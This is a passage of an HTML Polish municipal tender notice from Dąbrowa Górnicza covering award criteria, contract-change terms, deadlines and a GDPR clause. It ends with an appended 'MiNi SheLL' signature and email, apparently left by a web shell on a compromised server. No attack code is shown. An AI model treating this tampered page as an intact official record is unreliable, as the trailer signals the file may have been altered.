KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin realizacji zamówienia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy wstosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie: 1.1. zmianyterminu wykonania zamówienia w następujących przypadkach: 1.1.1. wystąpienie siły wyższejrozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego doprzewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższejstaranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. Wrazie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań w celuograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego naskutek działania siły wyższej. 1.1.2. wystąpienie nietypowych dla klimatu polskiego warunkówatmosferycznych uniemożliwiających prowadzenie zamówień/robót budowlanych zgodnie ztechnologią ich wykonania. Warunek zostanie spełniony w przypadku wystąpienia ciągłych opadówdeszczu lub śniegu uniemożliwiających realizację robót budowlanych przez okres min. 10 dniwówczas wystąpi możliwość wydłużenia terminu realizacji zadania o nie dłużej niż 15 dni. 1.1.3.zaistnienie odmiennych od przyjętych w dokumentacji projektowej warunków geologicznychkategoria gruntu, kurzawka, skała, niekontrolowane nasypy, obecność płyt betonowych itp) skutkująceniemożliwością realizowania przedmiotu umowy przy dotychczasowych założeniachtechnologicznych. W przypadku wystąpienia tego typu odstępstw od założonych termin realizacjiumowy zostanie wydłużony o czas w jakim zostały zaktualizowane warunki geologiczne poprzezprzeprowadzenie dodatkowych badań. 1.1.4. zaistnienia odmiennych od przyjętych w dokumentacjiprojektowej warunków terenowych, w szczególności napotkania innych niezinwentaryzowanych sieci,urządzeń podziemnych kolidujących z realizowanymi robotami, skutkujących niemożliwościąprowadzenia robót. W przypadku wystąpienia tego typu odstępstw od założonych, termin realizacjiumowy zostanie wydłużony o czas uzyskania niezbędnych uzgodnień, zaprojektowania niezbędnychzabezpieczeń sieci oraz dokonania przełożenia kolidującego uzbrojenia. 1.1.5. protestów mieszkańcówlub innych osób prawnych i fizycznych. W tym przypadku termin realizacji zadania zostaniewydłużony do czasu uzyskania ostatecznej decyzji rozstrzygającej protest. 1.1.6. koniecznośćwykonania robót zamiennych o pracochłonności większej od robót pierwotnie przewidzianych dowykonania. Termin zostanie wydłużony o czas niezbędny na wykonanie tych robót. 1.1.7. pojawieniasię na terenie budowy zewnętrznego inwestora prowadzącego roboty budowlane kolidujące,utrudniające bądź uniemożliwiające prowadzenie prac budowlanych objętych zawartą umową. Terminzostanie wydłużony o czas niezbędny na dokonanie uzgodnień i podpisanie porozumieńumożliwiających realizację umowy. 1.1.8.opóźnień w przyłączeniu do sieci zewnętrznych przezgestorów mediów, powstałych z przyczyn nie leżących po stronie Wykonawcy. Termin zostaniewydłużony o czas niezbędny na wykonanie przyłączy. 1.1.9.opóźnień w uzyskaniu niezbędnychpozwoleń, zezwoleń, opinii niezbędnych do wykonania przedmiotu umowy powstałych z przyczyn nieleżących po stronie Wykonawcy. Termin zostanie wydłużony o czas, który był faktycznie niezbędnydo uzyskania w/w dokumentów. 1.1.10.zaistnienia okoliczności, o których mowa w art. 144 ust. 2, 3oraz 6 ustawy prawo zamówień publicznych. 1.1.11 wystąpienie temperatur poniżej +5°C w miejscurealizacji robót przez 3 kolejne dni kalendarzowe. Stwierdzenie ww. stanu spowoduje wstrzymanierealizacji zadania na okres zimowy, ponowne podjęcie robót nastąpi po 21.03.2020r. Wykonawca popodjęciu robót otrzyma czas na realizację zadania pomniejszony o ilość dni kalendarzowych, wktórych realizował zadanie przed jego wstrzymaniem. 1.2. zmiany stawki podatku VAT: 1.2.1.wprzypadku zwiększenia stawki VAT- wartość wynagrodzenia brutto nie ulegnie zmianie w okresieobowiązywania umowy, 1.2.2.w przypadku zmniejszenia stawki VAT- wartość wynagrodzenia bruttozostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT. 1.3. innezmiany do umowy: 1.3.1.zmiany przepisów prawa w trakcie realizacji zamówienia, powodującychkonieczność dostosowania dokumentacji, 1.3.2.zmiany Kierownika Budowy Wykonawcy na skutekzdarzeń losowych, zmian kadrowo- personalnych, utraty wymaganych uprawnień, utraty stanowiska zzastrzeżeniem równoważności uprawnień oraz wykazanego w ofercie doświadczenia zawodowego,1.3.3.zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianiewarunków udziału w postępowaniu pod warunkiem , że nowy podwykonawca wykaże spełnianiewarunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publicznedotychczasowy podwykonawca, 1.3.4. zmiany przepisów prawa istotnych dla postanowień zawartejumowy, 1.3.5.poprawy jakości lub innych parametrów charakterystycznych dla danego elementu robótbudowlanych, dostaw lub zmiana technologii, 1.3.6.aktualizacji rozwiązań projektowych z uwagi napostęp technologiczny bądź zmiany obowiązujących przepisów lub konieczność opracowaniaekspertyz, opinii archeologicznych. 1.4. w pozostałym zakresie do zmian do umowy stosuje się art.144 ust.1 pkt.2 pkt 3, pkt 4, pkt 5, pkt 6, ust. 1A, ust. 1b, ust. 1c, ust. 1d, ust.1e, oraz ust. 2 i ust. 3ustawy Pzp.. 2. W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowyprzyczyn o których mowa w ust.1 Wykonawca zobowiązany jest do niezwłocznego poinformowania otym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. 3. Zokoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisanyprzez obie strony. 4. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przezobie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnieniefaktyczne i prawne. 5. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formypisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-10-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">I. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: 1. Wykonawcy wspólnie ubiegającysię o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określonew punkcie 8 niniejszej SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tychwarunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ. 2. W przypadku, Wykonawcówwspólnie ubiegających się o udzielenie zamówienia dokumenty, o których mowa: 1. w pkt. 9.2.1.,9.2.2. SIWZ oraz w pkt. od 9.5.1. do 9.5.3. SIWZ należy przedłożyć odrębnie dla każdego zWykonawców wspólnie ubiegających się o udzielenie zamówienia; 2. w pkt. od 9.4.1 do 9.4.3. SIWZWykonawcy składają tak, aby wykazać, że wspólnie spełniają warunki udziału w postępowaniu; 3. wpkt. 9.1.1, 9.3 oraz 9.6. SIWZ Wykonawcy składają łącznie; 3. Ponadto ww. Wykonawcy ustanawiająPełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich wpostępowania i zawarcia umowy w sprawie zamówienia publicznego. 4. Wszelka korespondencjaprowadzona będzie wyłącznie z Pełnomocnikiem. 5 Jeżeli oferta Wykonawców wspólnie ubiegającychsię o udzielenie zamówienia publicznego zostanie wybrana, Zamawiający żąda złożenia przedzawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tychWykonawców. II. Wymagania dotyczące zabezpieczenia należytego wykonania umowy: Zamawiającywymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny bruttopodanej w ofercie na poszczególne zadanie. III. . Klauzula informacyjna dot. RODO: Zgodnie z art. 13ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO", informuję, że: 1.Administratorem Pani/Pana danych osobowych jest Prezydent Miasta Dąbrowa Górnicza z siedzibą wUrzędzie Miejskim w Dąbrowie Górniczej, ul. Graniczna 21, tel. 32 295 67 14, fax 32 295 96 77,e-mail: um@dabrowa-gornicza.pl. 2. Dane kontaktowe do Inspektora Ochrony Danych Osobowych wUrzędzie Miejskim, w Dąbrowie Górniczej: tel. 32 295 67 34, e-mail: iodo@dabrowa-gornicza.pl.". 3.,,Polityka praw i wolności" obowiązująca w Urzędzie Miejskim w Dąbrowie Górniczej (dostępna wBIP Urzędu Miejskiego w zakładce Dane podmiotu/Bezpieczeństwo danych osobowych link:(http://www.bip.dabrowa-gornicza.pl/62204) przewiduje prawo do dostępu do treści swoich danych iich poprawiania, 4. Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODOw celu realizacji ustawowych zadań Gminy Dąbrowa Górnicza związanych z prowadzonympostępowaniem o udzielenie przedmiotowego zamówienia i wynikających z przepisówobowiązującego prawa, w tym ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. z 2017 r. poz. 1579 z późn. zm.) zwanej dalej ,,ustawą Pzp", 5. Odbiorcami Pani/Pana danychosobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania woparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp. 6. Obowiązek podania przez Panią/Pana danychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym wprzepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7. W odniesieniu do Pani/Panadanych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, w tym podlegająprofilowaniu, stosownie do art. 22 RODO; 8. Pani/Pana dane osobowe będą przechowywane, zgodniez art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzieleniezamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czastrwania umowy. Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. wsprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawieorganizacji i zakresu działania archiwów zakładowych (Dz.U.2011.14.67 z dnia 2011.01.20) teczkiaktowe będą przechowywane w archiwum zakładowym przez okres 5 lat w przypadku dokumentacjizamówień publicznych oraz 10 lat w przypadku umów zawartych w wyniku postępowania w trybiezamówień publicznych, 9. Posiada Pani/Pan: 1. na podstawie art. 15 RODO prawo dostępu do danychosobowych Pani/Pana dotyczących; 2. na podstawie art. 16 RODO prawo do sprostowania Pani/Panadanych osobowych *; 3. na podstawie art. 18 RODO prawo żądania od administratora ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2RODO **; 4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznaPani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 10.Nie przysługuje Pani/Panu: 1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięciadanych osobowych; 2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. *Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym zustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. ** Wyjaśnienie:prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwaczłonkowskiego. IV. Uszczegółowienie sekcji IV.2) KRYTERIA OCENY OFERT: Termin realizacjizamówienia (T): Wykonawca winien zadeklarować termin realizacji zamówienia wyrażony w ilościdni kalendarzowych, przy czym termin nie może być krótszy niż 50 dni i dłuższy niż 60 dni od datypodpisania umowy. Brak deklaracji terminu realizacji zamówienia w Formularzu ofertowym bądź jegookreślenie powyżej 60 dni skutkować będzie odrzuceniem oferty w trybie art. 89 ust. 1 pkt 2 ustawyPzp. W przypadku deklaracji terminu realizacji poniżej 50 dni, do porównania złożonych ofert,przyjęte zostanie 50 dni, natomiast w treści umowy - zgodnie z deklaracją zawartą w ofercie. Ofertadeklarująca najkrótszy termin realizacji zamówienia, spośród wszystkich ważnych ofert otrzyma 40pkt.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com